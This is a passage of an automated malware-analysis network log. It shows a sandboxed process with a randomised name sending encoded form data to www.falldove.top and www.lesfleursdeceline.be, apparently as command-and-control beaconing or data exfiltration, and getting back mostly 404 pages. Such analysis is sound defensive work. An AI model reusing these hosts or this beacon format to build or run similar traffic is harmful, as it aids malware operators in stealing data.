                                          Data Raw: 34 62 33 34 68 74 3d 70 61 36 42 54 7a 30 56 65 6d 76 75 2f 31 38 79 6f 2f 42 6c 50 56 39 68 6c 6b 6b 79 48 61 67 6b 67 36 4f 55 58 55 37 63 65 37 46 65 57 52 47 59 57 70 75 7a 77 7a 73 69 61 31 61 42 48 62 51 54 78 34 6e 65 6a 35 71 5a 67 35 6b 45 2f 35 76 50 58 6b 71 68 49 4a 4e 6e 74 71 61 51 77 35 77 61 58 6c 78 58 70 6b 41 6d 76 2f 39 39 79 34 63 4f 4c 6c 63 6c 4f 58 76 50 38 4f 43 4e 6d 62 6e 58 75 4d 6e 78 54 70 70 33 69 53 64 70 56 64 36 68 59 46 56 72 73 43 32 76 33 62 67 6b 5a 46 50 4c 6f 35 6d 51 47 45 65 33 4a 63 4a 51 5a 71 42 6c 55 70 46 74 59 4d 39 56 58 75 4d 4e 77 42 67 55 75 77 56 6c 48 69 38 54 73 33 2b 4e 54 4e 74 6f 73 63 77 62 67 6f 44 71 75 78 62 6e
                                          Data Ascii: 4b34ht=pa6BTz0Vemvu/18yo/BlPV9hlkkyHagkg6OUXU7ce7FeWRGYWpuzwzsia1aBHbQTx4nej5qZg5kE/5vPXkqhIJNntqaQw5waXlxXpkAmv/99y4cOLlclOXvP8OCNmbnXuMnxTpp3iSdpVd6hYFVrsC2v3bgkZFPLo5mQGEe3JcJQZqBlUpFtYM9VXuMNwBgUuwVlHi8Ts3+NTNtoscwbgoDquxbn
                                          May 27, 2024 12:44:20.242775917 CEST637INHTTP/1.1 404 Not Found
                                          Date: Mon, 27 May 2024 10:44:20 GMT
                                          Server: Apache
                                          Content-Length: 493
                                          Connection: close
                                          Content-Type: text/html
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          23192.168.2.54973866.29.149.46806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:44:22.177687883 CEST1793OUTPOST /ewqf/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.falldove.top
                                          Origin: http://www.falldove.top
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 1243
                                          Referer: http://www.falldove.top/ewqf/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 70 61 36 42 54 7a 30 56 65 6d 76 75 2f 31 38 79 6f 2f 42 6c 50 56 39 68 6c 6b 6b 79 48 61 67 6b 67 36 4f 55 58 55 37 63 65 34 6c 65 57 6e 36 59 51 49 75 7a 32 44 73 69 54 56 61 36 48 62 51 4b 78 34 2f 53 6a 34 58 37 67 36 63 45 2b 61 6e 50 66 31 71 68 52 5a 4e 6e 79 61 61 54 30 35 78 59 58 6c 68 54 70 67 63 6d 76 2f 39 39 79 36 6f 4f 43 55 63 6c 49 58 76 4d 37 4f 43 4a 77 62 6e 37 75 4d 2b 45 54 70 39 4e 69 44 39 70 56 39 71 68 66 7a 70 72 77 53 32 58 6e 4c 67 38 5a 46 43 52 6f 35 4b 6d 47 46 36 4e 4a 65 70 51 61 73 49 66 51 4e 42 41 47 39 46 66 55 63 38 77 74 56 55 6e 74 68 68 72 4c 69 6b 44 74 47 43 2f 64 70 67 73 34 73 31 30 35 75 6a 78 68 52 50 32 2f 36 62 32 4f 30 76 69 32 74 4c 4c 77 78 32 4d 2f 67 4e 5a 33 62 49 30 64 47 39 67 43 75 6b 77 50 41 72 49 34 36 67 4d 49 52 4f 54 37 6a 34 78 6b 64 47 4f 32 41 79 31 4b 6a 6c 61 35 4b 54 53 2f 68 62 49 48 47 73 4e 46 35 6b 34 76 56 58 6a 34 73 51 6f 30 50 4d 72 77 2f 48 55 6a 72 4d 6b 4c 72 50 6a 67 50 79 78 71 35 45 56 63 4b 5a [TRUNCATED]
                                          Data Ascii: 4b34ht=pa6BTz0Vemvu/18yo/BlPV9hlkkyHagkg6OUXU7ce4leWn6YQIuz2DsiTVa6HbQKx4/Sj4X7g6cE+anPf1qhRZNnyaaT05xYXlhTpgcmv/99y6oOCUclIXvM7OCJwbn7uM+ETp9NiD9pV9qhfzprwS2XnLg8ZFCRo5KmGF6NJepQasIfQNBAG9FfUc8wtVUnthhrLikDtGC/dpgs4s105ujxhRP2/6b2O0vi2tLLwx2M/gNZ3bI0dG9gCukwPArI46gMIROT7j4xkdGO2Ay1Kjla5KTS/hbIHGsNF5k4vVXj4sQo0PMrw/HUjrMkLrPjgPyxq5EVcKZUcWvICL20g7ccRDo9pY6vI9W0smil4euHQQRssGyScny30N/g4IFveHKI1LC+tgfC5K+Z62IrMB+/KHDkZY/ZW8PRIT+hhYIFbpXpQkLVsbnBznUFv7ULynUFTID2GBZwasjnj+TEQJQ4I97Atugaog8QVhE80vMC1IKFugg3ZhTcWRKwvX4rxPrB2vIFDsMo8I5VTwP1BgMi+k2zg8lGt3bl15zqejymmlQOutbbrxrNjhrL7B9rhc967Fwveu6V2zTi/0gC95C0p7KPkW7eTzkQPWifcnIIbyGBjRZvjnTOftswmpqyDF0XtdCQ420ZrTZ7aGaZKVNjGClcjB6dNdZm+JBC2P6mACRKKXu4yMhyiBakRczVLrPttDiClbFjzWG8uPEc3VAmKRgaqBtxdyGT0xy26+hhZWSm1BeNxx/IVV/0rA1GiAEfNZl230lW0AghDp9wudrDAw3zkfKt7shJakmbhw89yaqVcBDXaDWy/aVVoqWSO9bTRgYcJWu2yRC7dPg3ZFrP6iIlYqBBBWuGof7lmPGOV36e47arVIhM2BVR22yx31JpfFs29r9otmv3ff6L8qQKs/QqOfsJAWaXHft+NiWyBdQrsL2iHrAvX0W+Wy3+khi4gnPcFb5+56jGXRTu5YyIWtk/1TFbdLvnobfuomttB [TRUNCATED]
                                          May 27, 2024 12:44:22.775367975 CEST637INHTTP/1.1 404 Not Found
                                          Date: Mon, 27 May 2024 10:44:22 GMT
                                          Server: Apache
                                          Content-Length: 493
                                          Connection: close
                                          Content-Type: text/html
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          24192.168.2.54973966.29.149.46806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:44:24.871393919 CEST503OUTGET /ewqf/?4b34ht=kYShQH1sa3Le60gDrsgCYGFyuVEpRJ0k4IW5QzbfeKprYk61XZyNmSsEdCDrGrgTxI+6jeCx+L1A4qHHQky9AsRR7ruU+KhrWGBfvU9SpfMi+rY6DVY8elzf7b7Bw6Cu6g==&UxF=2Nflznk0WJ3hjv HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.falldove.top
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:44:25.474874020 CEST652INHTTP/1.1 404 Not Found
                                          Date: Mon, 27 May 2024 10:44:25 GMT
                                          Server: Apache
                                          Content-Length: 493
                                          Connection: close
                                          Content-Type: text/html; charset=utf-8
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          25192.168.2.5497403.125.172.46806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:44:32.232439995 CEST780OUTPOST /11y6/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.lesfleursdeceline.be
                                          Origin: http://www.lesfleursdeceline.be
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 207
                                          Referer: http://www.lesfleursdeceline.be/11y6/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 4f 79 61 61 42 67 37 38 4e 48 51 45 44 6f 4c 50 4d 53 69 6c 42 75 36 6f 62 52 30 71 7a 33 6c 45 65 7a 73 64 37 5a 38 67 61 58 6f 7a 48 79 59 45 44 35 78 32 7a 66 57 4a 75 48 6f 70 55 6c 7a 34 71 31 74 36 39 41 57 73 2f 62 41 79 61 61 35 32 39 58 48 46 6a 5a 52 4b 51 70 58 47 51 35 57 62 70 55 4f 30 30 78 4e 48 33 52 75 57 35 61 37 50 4b 48 30 75 54 6b 75 79 6b 32 71 45 4f 5a 43 4c 75 41 7a 39 41 75 39 4c 36 61 53 47 36 6c 62 38 45 64 46 52 52 4a 74 70 43 55 63 37 59 77 45 62 51 63 52 65 31 59 30 38 49 37 39 68 30 36 34 4d 4b 59 64 48 48 43 36 53 76 79 36 4c 36 39 37 68 72 2b 72 68 65 4e 6b 3d
                                          Data Ascii: 4b34ht=OyaaBg78NHQEDoLPMSilBu6obR0qz3lEezsd7Z8gaXozHyYED5x2zfWJuHopUlz4q1t69AWs/bAyaa529XHFjZRKQpXGQ5WbpUO00xNH3RuW5a7PKH0uTkuyk2qEOZCLuAz9Au9L6aSG6lb8EdFRRJtpCUc7YwEbQcRe1Y08I79h064MKYdHHC6Svy6L697hr+rheNk=
                                          May 27, 2024 12:44:32.907332897 CEST1236INHTTP/1.1 404 Not Found
                                          Server: openresty
                                          Date: Mon, 27 May 2024 10:44:32 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Set-Cookie: PHPSESSID=k9d4iv5dbh9ou7ovo21hqi26vc; path=/; domain=lesfleursdeceline.be; HttpOnly
                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                          Cache-Control: no-store, no-cache, must-revalidate
                                          Pragma: no-cache
                                          Content-Encoding: gzip
                                          Data Raw: 33 33 32 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d eb 72 1b c7 92 e6 ef e3 88 79 87 36 76 6c 91 2b 02 e0 4d 17 52 84 bc 34 45 59 9c 11 25 8e 48 d9 e7 1c 49 83 68 34 1a 40 5b 40 37 d4 17 52 b4 ac f7 19 bf c6 fa c5 f6 fb 32 ab ba ab 71 21 61 1f 9d 89 dd 88 75 58 44 a3 ab 2a 2b 2b 2b 2b 33 2b 33 ab 70 f0 f5 93 97 47 17 7f 3b 3b f6 46 f9 64 fc f8 ab 03 7e 78 c1 d8 cf b2 4e 23 4e 9a 3f 67 0d 6f 9a 86 83 e8 63 a7 91 0c f7 51 2b 9f 66 fb ed 76 32 9c b6 26 61 3b ce fe 47 c3 1b fb f1 b0 d3 18 a4 0d 36 0f fd fe e3 83 71 14 bf f7 d2 70 dc 69 a0 6d 90 c4 71 18 e4 0d 6f 04 38 9d 86 85 d0 df ea 47 db e3 5f 8a d1 de 83 c1 68 bb 15 8c 93 a2 3f 48 93 38 6f c5 21 2a 07 69 92 65 49 1a 0d a3 78 35 78 03 34 cd 5a c3 2c f7 f3 28 68 05 c9 64 06 c6 24 cc 7d 2f 18 f9 69 16 e6 9d 46 91 0f 9a 0f 1b 2e e4 08 78 fe 21 1c db c1 38 0a e3 bc 1d 4d 86 ed 81 7f c9 f6 59 3b eb 35 cd 73 2b bb 1c 7e 37 1d 75 1e 6e ef 6d 86 3b f7 fc bd 5e c3 cb af a7 61 a7 11 4d fc 61 d8 46 f1 dd 8f 93 71 c3 cb a2 5f 42 10 db 8f af ff a9 f8 34 b7 ee [TRUNCATED]
                                          Data Ascii: 3323}ry6vl+MR4EY%HIh4@[@7R2q!auXD*++++3+3pG;;Fd~xN#N?gocQ+fv2&a;G6qpimqo8G_h?H8o!*ieIx5x4Z,(hd$}/iF.x!8MY;5s+~7unm;^aMaFq_B4QOE:<)Q]wt1*"4|}<J&SproN!|>x7EyBcir~>C0w/Q?nf?;[d(IisGcsAm* Y{sO/zxdy@QEe5BC?3gA}omJMN~7UN^?|@Ewv(D!i{di1vN_GFpA2NnI%u_."#y2Fv_~_~B24$|zxFLaOG_rP pM
                                          May 27, 2024 12:44:32.907351971 CEST1236INData Raw: 6b 6b eb 9d c7 9f c6 61 ee 85 9d af b7 1e d1 1a c9 bd bc 23 6f a3 c1 da d7 e1 b7 df 5e 45 71 3f b9 6a 45 b0 c7 d2 9f 28 da 1f 77 ee 6f 6e ae 7f 1a 24 e9 9a 36 dc dc c8 3b fd 24 28 26 50 37 ad 0f 45 98 5e 9f 87 63 18 6f 49 7a 38 1e af dd a1 75 e7
                                          Data Ascii: kka#o^Eq?jE(won$6;$(&P7E^coIz8u=(4PbNx;5a>zp\yF"V5P==2(0]k!MFF{Hk#0Fk>`eJa`Lb4[(BLD@
                                          May 27, 2024 12:44:32.907361984 CEST1236INData Raw: a2 8f fc a0 09 5d 14 34 63 6f 0c 39 3b f0 8b 71 ce 27 48 c2 38 f4 7a cd 5e 1e 37 53 f3 99 35 c7 e6 a9 1f 9b 87 de 55 73 cb 83 6f 0c 0d 06 a9 3c e4 cd 42 3e 47 84 08 16 6d 42 ff 45 7d 54 0f 9b fd cc 1b f7 92 8f 80 82 ff b0 e9 69 0e 28 e2 e2 c4 ea
                                          Data Ascii: ]4co9;q'H8z^7S5Uso<B>GmBE}Ti(hB|gc\\$)=pO.w~8m>==P.B*:C[}A?zQiX!Ez?GwA#W5Vk'Z&7HwyjN!|
                                          May 27, 2024 12:44:32.907376051 CEST1236INData Raw: fd 9b ea 6c 3a 57 f4 e9 82 6e c9 7e 0a bf 62 e6 a5 70 5c c2 bd 8b bf e0 32 d5 e9 e6 c1 72 9f 51 0f 33 c3 cb 44 78 59 12 2f fa ac 29 a2 6c e0 f5 88 e0 cc 4b 88 16 71 5a 7a d9 80 b6 14 2d 24 ab a9 51 d7 22 b4 08 ba 7d 37 07 90 d6 93 c0 d1 29 76 b5
                                          Data Ascii: l:Wn~bp\2rQ3DxY/)lKqZz-$Q"}7)vj]>>JQqR9_fH&&6pp<ruQP]BYvQ v!a0%@lYe?|Qsl2z^kv5m@&.g5_M(gBx/a_8J\lv
                                          May 27, 2024 12:44:32.907387018 CEST1236INData Raw: 8a db c4 e2 a4 62 bb bb 73 6f fb c1 e6 f6 bd ad 07 35 c4 6f a9 3a db 55 ad 7a e3 33 26 1d 27 06 16 73 57 45 ca ee 17 9d 90 72 b4 dd 2f 42 31 0c 61 66 71 20 df a0 81 7c ec 64 7a 8e 3d 0c 42 f6 b2 5e 8e cf 9f bd 3c eb 9e 1f 5f 5c 9c bc f8 e1 bc fb
                                          Data Ascii: bso5o:Uz3&'sWEr/B1afq |dz=B^<_\gN?\<{Ecp'''/_>_3t=zynAaA"RPX%/7]7?vX`|{ q`vxU575m
                                          May 27, 2024 12:44:32.907397032 CEST1236INData Raw: 4f 79 9e 3d 43 86 8f 0a 7b c3 eb 4c da ef ba 59 dd 06 8a bc 2f d3 f8 cd 4b ae 89 30 35 06 25 07 ce e9 67 4c b7 f6 2a 33 82 5f 2b 88 f9 48 fd 95 1d c3 1a 85 eb 11 f6 c0 3b 0e 18 fe 46 4a ee 33 39 f9 8d 81 c3 86 14 ab 06 e6 70 bf 08 72 e7 fd 54 de
                                          Data Ascii: Oy=C{LY/K05%gL*3_+H;FJ39prT3y;L[f^)2Ue-G~6,GX|Ecs{3R@.F}%BLRnx8q<@!O/'2 7o`=~7g?Ee-Efkc
                                          May 27, 2024 12:44:32.907407045 CEST776INData Raw: 70 82 75 84 64 14 e6 67 4b 93 4d 93 08 c4 18 37 1a 48 22 20 12 41 12 24 f4 51 b6 01 0b 9c fd 30 69 81 26 65 88 80 21 b1 98 1a 8f fb 00 6e 22 89 f1 ad 81 84 36 f9 90 f7 0f d0 97 0c 92 61 89 08 78 1c 4f 85 51 8c 93 d2 b0 52 bc 35 a4 33 01 36 ac 2c
                                          Data Ascii: pudgKM7H" A$Q0i&e!n"6axOQR536,g1h8mWYnZd(!FISvNQCP*blMSK8fI[9+b'.m]6$fLo-CZR)b)-+W{=QMt
                                          May 27, 2024 12:44:32.907418966 CEST1236INData Raw: 07 bc 00 ec 0e 33 71 61 14 c0 72 82 ae 41 6a 06 63 33 0f 25 af da 37 ae 90 71 84 13 af 4c e4 66 6a 75 69 77 9b 63 10 19 08 8a bd 29 93 ae 61 41 b5 bc e3 d8 74 0d ff 96 69 82 13 b1 d1 50 5c 55 c8 db 86 01 a6 55 61 c1 d1 70 2b 8f 25 a8 35 22 07 37
                                          Data Ascii: 3qarAjc3%7qLfjuiwc)aAtiP\UUap+%5"7nyjvOapBV9xO1((B&Au /a-x,ARcXno:sdM}&M+zy*52!;=k96&i=ePG0dv+mcX3H3+
                                          May 27, 2024 12:44:32.908011913 CEST1236INData Raw: da 30 99 73 0d e1 53 e0 4d 7e e3 f0 c8 9f e2 5e 44 9f 82 65 c6 02 95 5d 4f 9a 18 bb 73 a8 c8 70 91 c0 b5 7e 74 78 76 01 2a d0 5f cc 95 c3 b2 1d 24 0b c4 ef b7 e4 f1 18 c1 1c 88 b2 29 8a 30 27 90 47 03 cd d5 86 d1 6a c0 69 0b 24 d5 55 6d 08 ac 02
                                          Data Ascii: 0sSM~^De]Osp~txv*_$)0'Gji$Um 5d4=ncS z^,$M+!g"f>+8;hHpodfwsHY@/w8ndcn`C`@[ p"nt]KfZdwbXzd{
                                          May 27, 2024 12:44:32.908025026 CEST1236INData Raw: 6d 48 d6 9b 5b cc b5 da 46 08 94 0d 96 c8 29 b7 8d f8 0c b8 1a 85 a4 7b 66 bd 0b ab 58 b2 ea 1c db 1c 39 98 0f e6 26 8b d3 6c 28 bb 0e 64 b3 c0 55 6d 54 90 9c 0f 5b ae cd 96 39 71 31 83 72 06 0c 98 30 ae 86 e9 62 92 9a 49 c0 b5 e4 75 1c e2 ae 53
                                          Data Ascii: mH[F){fX9&l(dUmT[9q1r0bIuST[Pp#.nF9&MMFZMf;TFe,sT9_\GnJwsWSQ,h1pA|Bi'v@wFH+X&rl+:pI}OB'>Ds&
                                          May 27, 2024 12:44:32.913223982 CEST1236INData Raw: 82 9d e5 74 7b 2c d7 f7 79 5a 02 67 8b a3 8f 70 df 73 8c bb 00 70 52 5b 81 61 db 79 1b 34 b3 9f 5d 09 dc 20 b4 33 e8 76 ea a0 66 28 e2 6a 23 0f 99 a4 4f 8f 0d 3e 15 00 f8 25 79 cc a4 64 50 25 a2 b6 9f ab 0c 1d 2d 26 a6 53 ff 9c 56 95 7d ef e9 89
                                          Data Ascii: t{,yZgpspR[ay4] 3vf(j#O>%ydP%-&SV}lssy6MMZWA.Nq~u{oP02Pc!aP6U!:@~u&v$]<Z6_]Fgv}yRz:v,TD7cp[H*,#C.)#eG<


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          26192.168.2.5497413.125.172.46806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:44:34.766613960 CEST800OUTPOST /11y6/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.lesfleursdeceline.be
                                          Origin: http://www.lesfleursdeceline.be
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 227
                                          Referer: http://www.lesfleursdeceline.be/11y6/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 4f 79 61 61 42 67 37 38 4e 48 51 45 52 5a 37 50 4f 78 4b 6c 57 65 36 33 55 78 30 71 71 6e 6b 44 65 30 6b 64 37 59 4a 37 61 6c 38 7a 48 58 63 45 43 38 4e 32 2b 2f 57 4a 6d 6e 6f 73 61 46 7a 6d 71 31 51 48 39 42 71 73 2f 62 55 79 61 65 78 32 39 45 76 43 79 5a 52 49 4d 70 58 45 64 5a 57 62 70 55 4f 30 30 78 5a 35 33 56 36 57 35 71 4c 50 4c 6d 30 70 61 45 75 74 73 57 71 45 63 70 43 58 75 41 79 71 41 72 5a 74 36 66 65 47 36 6b 72 38 45 73 46 53 4b 5a 74 77 4d 30 64 51 62 41 52 73 57 4e 64 49 39 76 46 64 49 61 42 73 31 4d 56 6d 51 36 56 76 55 69 57 71 2f 68 79 38 72 4e 61 49 78 64 37 52 41 61 78 34 43 4b 67 4a 67 73 42 78 76 66 30 31 41 38 32 67 42 6e 75 51
                                          Data Ascii: 4b34ht=OyaaBg78NHQERZ7POxKlWe63Ux0qqnkDe0kd7YJ7al8zHXcEC8N2+/WJmnosaFzmq1QH9Bqs/bUyaex29EvCyZRIMpXEdZWbpUO00xZ53V6W5qLPLm0paEutsWqEcpCXuAyqArZt6feG6kr8EsFSKZtwM0dQbARsWNdI9vFdIaBs1MVmQ6VvUiWq/hy8rNaIxd7RAax4CKgJgsBxvf01A82gBnuQ
                                          May 27, 2024 12:44:35.478884935 CEST1236INHTTP/1.1 404 Not Found
                                          Server: openresty
                                          Date: Mon, 27 May 2024 10:44:35 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Set-Cookie: PHPSESSID=7uhsc6i4svlnjts9umv7lmifdb; path=/; domain=lesfleursdeceline.be; HttpOnly
                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                          Cache-Control: no-store, no-cache, must-revalidate
                                          Pragma: no-cache
                                          Content-Encoding: gzip
